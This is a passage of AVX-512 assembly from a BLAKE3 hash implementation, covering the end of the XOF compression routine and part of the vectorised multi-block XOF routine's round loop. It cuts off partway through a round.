vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
vmovdqu xmmword ptr [rdi], xmm0
vmovdqu xmmword ptr [rdi+0x10], xmm1
ret
.p2align 6
_blake3_compress_xof_avx512:
blake3_compress_xof_avx512:
_CET_ENDBR
vmovdqu xmm0, xmmword ptr [rdi]
vmovdqu xmm1, xmmword ptr [rdi+0x10]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
vmovq xmm3, rcx
vmovq xmm4, rdx
vpunpcklqdq xmm3, xmm3, xmm4
vmovaps xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovups xmm8, xmmword ptr [rsi]
vmovups xmm9, xmmword ptr [rsi+0x10]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [rsi+0x20]
vmovups xmm9, xmmword ptr [rsi+0x30]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
vpxor xmm2, xmm2, [rdi]
vpxor xmm3, xmm3, [rdi+0x10]
vmovdqu xmmword ptr [r9], xmm0
vmovdqu xmmword ptr [r9+0x10], xmm1
vmovdqu xmmword ptr [r9+0x20], xmm2
vmovdqu xmmword ptr [r9+0x30], xmm3
ret
.p2align 6
blake3_xof_many_avx512:
_blake3_xof_many_avx512:
_CET_ENDBR
mov r10,QWORD PTR [rsp+0x8]
cmp r10,0x1
ja 2f
vmovdqu xmm0,XMMWORD PTR [rdi]
vmovdqu xmm1,XMMWORD PTR [rdi+0x10]
movzx eax,r8b
movzx edx,dl
shl rax,0x20
add rdx,rax
vmovq xmm3,rcx
vmovq xmm4,rdx
vpunpcklqdq xmm3,xmm3,xmm4
vmovaps xmm2,XMMWORD PTR [BLAKE3_IV+rip]
vmovups xmm8,XMMWORD PTR [rsi]
vmovups xmm9,XMMWORD PTR [rsi+0x10]
vshufps xmm4,xmm8,xmm9,0x88
vshufps xmm5,xmm8,xmm9,0xdd
vmovups xmm8,XMMWORD PTR [rsi+0x20]
vmovups xmm9,XMMWORD PTR [rsi+0x30]
vshufps xmm6,xmm8,xmm9,0x88
vshufps xmm7,xmm8,xmm9,0xdd
vpshufd xmm6,xmm6,0x93
vpshufd xmm7,xmm7,0x93
mov al,0x7
3:
vpaddd xmm0,xmm0,xmm4
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm5
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x93
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x39
vpaddd xmm0,xmm0,xmm6
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x10
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0xc
vpaddd xmm0,xmm0,xmm7
vpaddd xmm0,xmm0,xmm1
vpxord xmm3,xmm3,xmm0
vprord xmm3,xmm3,0x8
vpaddd xmm2,xmm2,xmm3
vpxord xmm1,xmm1,xmm2
vprord xmm1,xmm1,0x7
vpshufd xmm0,xmm0,0x39
vpshufd xmm3,xmm3,0x4e
vpshufd xmm2,xmm2,0x93
dec al
je 3f
vshufps xmm8,xmm4,xmm5,0xd6
vpshufd xmm9,xmm4,0xf
vpshufd xmm4,xmm8,0x39
vshufps xmm8,xmm6,xmm7,0xfa
vpblendd xmm9,xmm9,xmm8,0xaa
vpunpcklqdq xmm8,xmm7,xmm5
vpblendd xmm8,xmm8,xmm6,0x88
vpshufd xmm8,xmm8,0x78
vpunpckhdq xmm5,xmm5,xmm7
vpunpckldq xmm6,xmm6,xmm5
vpshufd xmm7,xmm6,0x1e
vmovdqa xmm5,xmm9
vmovdqa xmm6,xmm8
jmp 3b
3:
vpxor xmm0,xmm0,xmm2
vpxor xmm1,xmm1,xmm3
vpxor xmm2,xmm2,XMMWORD PTR [rdi]
vpxor xmm3,xmm3,XMMWORD PTR [rdi+0x10]
vmovdqu XMMWORD PTR [r9],xmm0
vmovdqu XMMWORD PTR [r9+0x10],xmm1
vmovdqu XMMWORD PTR [r9+0x20],xmm2
vmovdqu XMMWORD PTR [r9+0x30],xmm3
ret
.p2align 6
2:
push rbp
mov rbp,rsp
sub rsp,0x90
and rsp,0xffffffffffffffc0
vpbroadcastd zmm0,ecx
shr rcx,0x20
vpbroadcastd zmm1,ecx
vpaddd zmm2,zmm0,ZMMWORD PTR [ADD0+rip]
vpcmpltud k1,zmm2,zmm0
vpaddd zmm1{k1},zmm1,DWORD PTR [ADD1+rip]{1to16}
vmovdqa32 ZMMWORD PTR [rsp],zmm2
vmovdqa32 ZMMWORD PTR [rsp+0x40],zmm1
cmp r10,0x10
jb 2f
3:
vpbroadcastd zmm16,DWORD PTR [rsi]
vpbroadcastd zmm17,DWORD PTR [rsi+0x4]
vpbroadcastd zmm18,DWORD PTR [rsi+0x8]
vpbroadcastd zmm19,DWORD PTR [rsi+0xc]
vpbroadcastd zmm20,DWORD PTR [rsi+0x10]
vpbroadcastd zmm21,DWORD PTR [rsi+0x14]
vpbroadcastd zmm22,DWORD PTR [rsi+0x18]
vpbroadcastd zmm23,DWORD PTR [rsi+0x1c]
vpbroadcastd zmm24,DWORD PTR [rsi+0x20]
vpbroadcastd zmm25,DWORD PTR [rsi+0x24]
vpbroadcastd zmm26,DWORD PTR [rsi+0x28]
vpbroadcastd zmm27,DWORD PTR [rsi+0x2c]
vpbroadcastd zmm28,DWORD PTR [rsi+0x30]
vpbroadcastd zmm29,DWORD PTR [rsi+0x34]
vpbroadcastd zmm30,DWORD PTR [rsi+0x38]
vpbroadcastd zmm31,DWORD PTR [rsi+0x3c]
vpbroadcastd zmm0,DWORD PTR [rdi]
vpbroadcastd zmm1,DWORD PTR [rdi+0x4]
vpbroadcastd zmm2,DWORD PTR [rdi+0x8]
vpbroadcastd zmm3,DWORD PTR [rdi+0xc]
vpbroadcastd zmm4,DWORD PTR [rdi+0x10]
vpbroadcastd zmm5,DWORD PTR [rdi+0x14]
vpbroadcastd zmm6,DWORD PTR [rdi+0x18]
vpbroadcastd zmm7,DWORD PTR [rdi+0x1c]
vpbroadcastd zmm8,DWORD PTR [BLAKE3_IV_0+rip]
vpbroadcastd zmm9,DWORD PTR [BLAKE3_IV_1+rip]
vpbroadcastd zmm10,DWORD PTR [BLAKE3_IV_2+rip]
vpbroadcastd zmm11,DWORD PTR [BLAKE3_IV_3+rip]
vmovdqa32 zmm12,ZMMWORD PTR [rsp]
vmovdqa32 zmm13,ZMMWORD PTR [rsp+0x40]
vpbroadcastd zmm14,edx
vpbroadcastd zmm15,r8d
vpaddd zmm0,zmm0,zmm16
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm20
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm17
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm21
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm24
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm28
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm25
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm29
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm18
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm23
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm22
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm16
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm17
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm25
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm27
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm30
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm19
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm29
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm20
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm18
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm22
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm27
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm21
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm31
vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm26
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm30
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm23
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm19
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm20
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm21
vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm16
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm24
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm28
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm31
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm29
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm26
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm23
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm16
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
